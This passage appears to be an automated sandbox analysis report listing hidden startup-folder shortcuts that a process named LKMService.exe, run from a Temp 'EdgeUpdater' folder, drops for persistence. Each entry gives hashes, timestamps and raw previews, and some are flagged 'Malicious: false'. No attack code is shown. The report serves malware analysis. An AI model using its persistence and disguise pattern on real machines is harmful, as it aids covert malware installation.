SHA-256:	69B136A611768FC139EE7094A6F6BAF3B43D0531DA1B9220FF3352BBCF202DBA
SHA-512:	B4AE3A5EE674B22DA070600A35BD873E78FA2583E2B518E8D260804C95D109F19D98E2596A1F1A1306F31BAC6904CDFE10F3E20D4ECB1420418A83112C338E76
Malicious:	false
Preview:	L..................F....".....X:3...S`.=3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a0df83e3640e4d8d8bc92cc51336f2f5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:25 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937792679648034
Encrypted:	false
SSDEEP:	24:88RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8KJD3lfAvRAt41vgHyg
MD5:	8E144DEE88BB6794847DBD1F5B8AD7D6
SHA1:	18360A040F49F3852264DC9F7730DB04556B3937
SHA-256:	4D5F7B5068036AB7C4BDA2B26EBCE6EDE2DBE92ED20218D10B8E203F04DDB364
SHA-512:	9C6B3274300413738CA37973A3D70F762BD19B68EF678A0D17FA50D625CF9B0614E7EB18872D610C19BD2FC5150CDF331DF44059134D6CB5B1DA5C514344A160
Malicious:	false
Preview:	L..................F....".....X:3......C3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a37d9ccfb0194adf8213dc3f6997f78f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:23 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938324763258287
Encrypted:	false
SSDEEP:	24:83+RRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8uPJD3lfAvRAt41vgHyg
MD5:	A898AD5B5135D8D74603C0995247412C
SHA1:	4979C1FF6D7D8982D68F1D600FF347BB7D20636A
SHA-256:	1771ED1B2A75D36A1C79DE0340D96DEB2961792674F524554602608AD6DC9ED6
SHA-512:	6B7B19857AF4C3CE4291F031850B00D9B99F808153471D26ED2A3E167D0F8B53EE13DBCADE4B78133C8BB45173C750AEB9C9A67997C38DD8340E6BA152DC81BE
Malicious:	false
Preview:	L..................F....".....X:3....{.B3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a97a4cd7e177496cae1d18f2d60edeb6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:44 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938737410561042
Encrypted:	false
SSDEEP:	24:8sRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:86JD3lfAvRAt41vgHyg
MD5:	4107C43803D0B4844B2E000CF2FC9F3D
SHA1:	AD13F3D4F5B5947B8826F5057B2857440685C852
SHA-256:	0E79C230A1F0B320A6ED009132F7B9F6526FBB03F43DBF2A8CD2C1DBC534952B
SHA-512:	142944BEA6F0DB19A20B3EF0D6F616D5E290384317496557141D0E51B1FA6A993ACAF1067F1A5ADDEDB0C0585E808382D199B2CF4C77871B417CDC73813D0D2B
Malicious:	false
Preview:	L..................F....".....X:3.....oN3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aa8be52a868740eab8f8ec82641ac0c1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:18 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937702814545189
Encrypted:	false
SSDEEP:	24:8cRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8qJD3lfAvRAt41vgHyg
MD5:	D366765E795FA0E1BD7752097C4CF4CE
SHA1:	B3374301CEE8C01B41DE6886D41969D50BFD3651
SHA-256:	D72D2256DCD115E289ED11185CF1ECCA878124A5CF7060D856DF596C49E30328
SHA-512:	A5C3C4B6FF81D65BFA78E83E92013A7A384D7ACE403427253E05D94C85F19B1A9D184EE313FCFCFF960585B471075FA26600A820A5A82931BA02EF9A9C9F88A1
Malicious:	false
Preview:	L..................F....".....X:3.....>3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:46 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938924968243301
Encrypted:	false
SSDEEP:	24:8dOLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8d4JD3lfAvRAt41vgHyg
MD5:	D896D348123E40FB50AD72EC7ED5F633
SHA1:	B22717EA29E77F2C1F3BD4539329884511428511
SHA-256:	DCEF14CB8BC70603A37212CFCB70564FF8D70CABC7A38DF2195E509BB6131263
SHA-512:	CAF163FDEAFFD990105C770ED59E63272B61C0F098C9A487E19899DD1668623C84C71ECBF1F4FD52EAA05CFD592C8AD335D595539EF2051113D2ECAD36317C0D
Malicious:	false
Preview:	L..................F....".....X:3..."..O3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b87af243048a4cb58e7fbbcc09d4d0bb.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:48 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.936418481687168
Encrypted:	false
SSDEEP:	24:8XLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8tJD3lfAvRAt41vgHyg
MD5:	C7741D73B7EE0805DF863373F6349364
SHA1:	E632281F8E2C6ADD22A217DD3F9977AFA14E6E0B
SHA-256:	C42B037D4167989A0D2C44E6E4CB94493F2AE1076C555505200D17D602FE5AF0
SHA-512:	F80628D077B4497D0FB81B3D1FABF28C071FF654EF5930A58B29CDFAE89E72475DAAB4F1870079E48EB769216377DBA24787F98F3C0481EB7C9118769D59CB41
Malicious:	false
Preview:	L..................F....".....X:3...`..P3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ba60f2e1542943c49cb63fcb463703a8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:01 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.933296001935866
Encrypted:	false
SSDEEP:	24:8MRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8aJD3lfAvRAt41vgHyg
MD5:	F95B5EA7F2290101EBA5A62AB73BEF1A
SHA1:	946BA22E5EBF7FEDD2577AC002D29AB764EF002E
SHA-256:	30DC35EC00DC8B043C9EA714952811B1922CF817BAFFD91B147D842C8C413C0D
SHA-512:	B4A8A9AA6DCC3D4F0A4917A765E6C70B46DB174C625C02B594DF4949DE6D818611D04A83A3E37873E26B778BC394D038B66F0AAE1B183B0AC35CCAE117626BCE
Malicious:	false
Preview:	L..................F....".....X:3....E.Y3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_baaca187cd3746ad83aad8ceea07a8c5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:12 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.943046682849563
Encrypted:	false
SSDEEP:	24:8URJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8SJD3lfAvRAt41vgHyg
MD5:	E25FB1598E83FB38BB935982BCCA1498
SHA1:	4F403941FD50D2C63B28C4304761754162A0BEC7
SHA-256:	989D2A37999D1EA6E1BCBDDD455336D1F83393BD51560AC7D7AAD13B2EEAB2A7
SHA-512:	11DFDD84243F4691AF35C1AED4B62D235DE4F0B56964038423331DF55D33DFC9D2DFD7A2B841E2EB5D5AC4ABCD648D1676DAD9F4E6899803663AFCE9206993E3
Malicious:	false
Preview:	L..................F....".....X:3....)_3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c365a14f7cc645439df5ba22b5f10906.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:07 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9364377634237595
Encrypted:	false
SSDEEP:	24:8nRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nPJD3lfAvRAt41vgHyg
MD5:	4FAB0FB8EE6F8901226B6A87741DEB43
SHA1:	F6BCFC746DBBEE510881A3F898A404FFB96EAAE2
SHA-256:	2900F70A9180647D36F71F51B02A950E8446D9C159186F64F0D6C7B0901B4844
SHA-512:	359D503460B5DE2C883A7781F4AD10D9F4F9ABBC4135B784F946D63938A571A23688BEB9CEF40263DC792764026C602287DC5271C1C1847D649A336F2624C408
Malicious:	false
Preview:	L..................F....".....X:3...o..\3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c460e1bb0908400c8719e2ff6efc6472.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:55 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938289541052928
Encrypted:	false
SSDEEP:	24:8VcVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8VuJD3lfAvRAt41vgHyg
MD5:	02F6A8C9AD3EEFC8A9AA7C4FF1538C7D
SHA1:	06EEFFABB1E600C2BAD490073C2F766E904899BB
SHA-256:	15E39329AFF4A21EF0876726141E2CDDD48F5C2E9BF36F25A93D5CC7283A6790
SHA-512:	BBCD968958B24EC222F3AEFA38010400A5AA7E561EC460818B968102BCF1E829E4B4EF8E631FA8B5CC2F052F2EF8FBE1DE084C37BF7CC9534B9538D22B2302CA
Malicious:	false
Preview:	L..................F....".....X:3...k.@U3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c894375b99af48eb88116328de9ffb98.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:31 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937577286723054
Encrypted:	false
SSDEEP:	24:8aRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8sJD3lfAvRAt41vgHyg
MD5:	84AB3B638E3B3A5D8190402D16875747
SHA1:	8B45035AEE05672F9FF56DD8BEF1E866310A1F36
SHA-256:	BE117C562600CDC491AE46727142A3B549B8F96D901AFBDD5DDB8A3E04C41DDF
SHA-512:	6A68A515FC21544F488FCF7F497AE92086F400A6F3A58F6B7398731DD1BFD1137896F01A004CE2AB4B840194E5984FAD03D1C208712645039839E7EC8524ECAA
Malicious:	false
Preview:	L..................F....".....X:3....F.F3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d550e8040e9f44f19bffddc3e8e06d5e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:40 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.934255346712717
Encrypted:	false
SSDEEP:	24:8QRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8mJD3lfAvRAt41vgHyg
MD5:	5E2710EC0A835EDCD83B74E4EC9307F3
SHA1:	95816582215139366C61E0798674B6319EAA4A2A
SHA-256:	0A03CF988D17F550B82DB454347C6F68F10E7DD39EBF2FF70DAC0E40E8E7C9FE
SHA-512:	FE823D8444D43E5BB53A3701AE042073B640FB232319B0DF2BA13D05CEBDA8A00E834C435AD549E759C6BB899A497B80AD0AB3C2EC5B4F6EB44F90AE4F6FA11C
Malicious:	false
Preview:	L..................F....".....X:3.....lL3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d5b565aee0b842f89c22c5f172678df9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:17 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940727753975688
Encrypted:	false
SSDEEP:	24:8fVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8zJD3lfAvRAt41vgHyg
MD5:	356C87E3CB9A224885F4A0CAA35C9940
SHA1:	B9BADBD13B2BCDDFBD0F10C18A151139966564F7
SHA-256:	6BFF19B80DC03CC9A308C8F7833A66634A1301640CD44D55A9BE2808F72E2379
SHA-512:	DD9FB9CECECE9519B7930FA9E9EA30F90A24F41DF672D19FB6DA72208CFCF39D8D8245F0DEA897CA8A41F7C68B873FCDA5B584DDF73E8154395B618A48A5527F
Malicious:	false
